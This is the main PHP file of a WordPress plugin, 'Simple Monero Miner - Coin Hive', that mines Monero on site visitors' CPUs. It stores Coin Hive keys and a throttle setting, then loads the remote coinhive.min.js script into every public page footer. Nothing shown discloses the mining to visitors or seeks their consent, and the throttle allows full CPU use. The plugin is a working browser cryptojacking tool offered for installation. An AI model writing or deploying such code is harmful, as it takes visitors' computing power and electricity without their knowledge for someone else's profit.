<?php
/*
Plugin Name: Simple Monero Miner - Coin Hive
Description: Alternative way to earn money by mining monero on visitors CPU.
Version: 1.0
Author: Thiyagesh M
Author URI: thyash11.github.io
*/

if ( ! defined( 'ABSPATH' ) ) exit;

function smmChSetOptions() {
	add_option('smmch_public_sitekey','');
	add_option('smmch_private_sitekey','');
	add_option('smmch_throttle','0.3');
}
function smmChReSetOptions(){
	
}
function smmChAdminRegisterSettings() {
	register_setting('smmch_options','smmch_public_sitekey');
	register_setting('smmch_options','smmch_private_sitekey');
	register_setting('smmch_options','smmch_throttle');
}
/*---ACTIVATION, DEACTIVATION HOOKS, ADMIN OPTION REGISTER SETTINGS--*/
register_activation_hook(__FILE__, 'smmChSetOptions' );
register_deactivation_hook(__FILE__, 'smmChReSetOptions' );
add_action('admin_init', 'smmChAdminRegisterSettings');

function smmChSettings(){
	echo '<br/>';
	echo '<h2>Simple Monero Miner</h2>';
	$smmch_publickey = esc_attr(get_option('smmch_public_sitekey'));
	$smmch_privatekey = esc_attr(get_option('smmch_private_sitekey'));
	$smmch_throttle = esc_attr(get_option('smmch_throttle'));
	?>
	<div>
		<div class="left-side-box">
			<form method="post" action="options.php">
				<?php settings_fields('smmch_options'); ?>
				<div class="smmch-each-section">
					<label class="main-descpn" for="smmch_public_sitekey">Coin Hive Public Key</label>
					<input type="text" name="smmch_public_sitekey" id="smmch_public_sitekey" value="<?php echo $smmch_publickey; ?>" />
					<span class="description">Add your public key in this input box</span><br/>
				</div>
				<div class="smmch-each-section">
					<label class="main-descpn" for="smmch_private_sitekey">Coin Hive Private Key</label>
					<input type="password" name="smmch_private_sitekey" id="smmch_private_sitekey" value="<?php echo $smmch_privatekey; ?>" />
					<span class="description">Add your private key in this input box to visualize the statistics</span><br/>
				</div>
				<div class="smmch-each-section">
					<label class="main-descpn" for="smmch_throttle">Speed/Throttle</label>
					<input type="text" name="smmch_throttle" id="smmch_throttle" value="<?php echo $smmch_throttle; ?>" />
					<span class="description">(0-1) 0 means 0% idle, cpu runs at 100% efficiency. 0.5 means 50% idle, cpu runs at 50% efficiency. 0.8 means 80% idle, cpu runs at 20% efficiency.</span><br/>
				</div>
				<div class="smmch-each-section">
					<input class="button-primary" type="submit" name="Save" value="Save Options" /><br/>
				</div>
			</form>
			
			<?php require_once( plugin_dir_path( __FILE__ ) . 'includes/smmch-stats.php' ); ?>
		</div>
	</div>
<?php
}
function smmChMenu() {
  add_options_page('Monero Miner | Admin Settings', 'Simple Monero Miner', 'administrator', 'simple-monero-miner-coin-hive', 'smmChSettings');
}
add_filter('admin_menu', 'smmChMenu');

/*---ADMIN CSS---*/
function smmChAdminRegisterHead() {
	wp_enqueue_style( 'smmch-admin-style', plugin_dir_url( __FILE__ ) . '/css/admin-custom.css');
}
add_action('admin_enqueue_scripts', 'smmChAdminRegisterHead');

/*---COIN HIVE SCRIPT ENQUEUER---*/
function smmCHCoinhive() {
	wp_enqueue_script('smmch-coinhive-script','https://coin-hive.com/lib/coinhive.min.js',array());
	/*add coinhive script*/
	require_once( plugin_dir_path( __FILE__ ) . 'includes/smmch-script-enqueuer.php' );
}

add_action('wp_footer', 'smmCHCoinhive');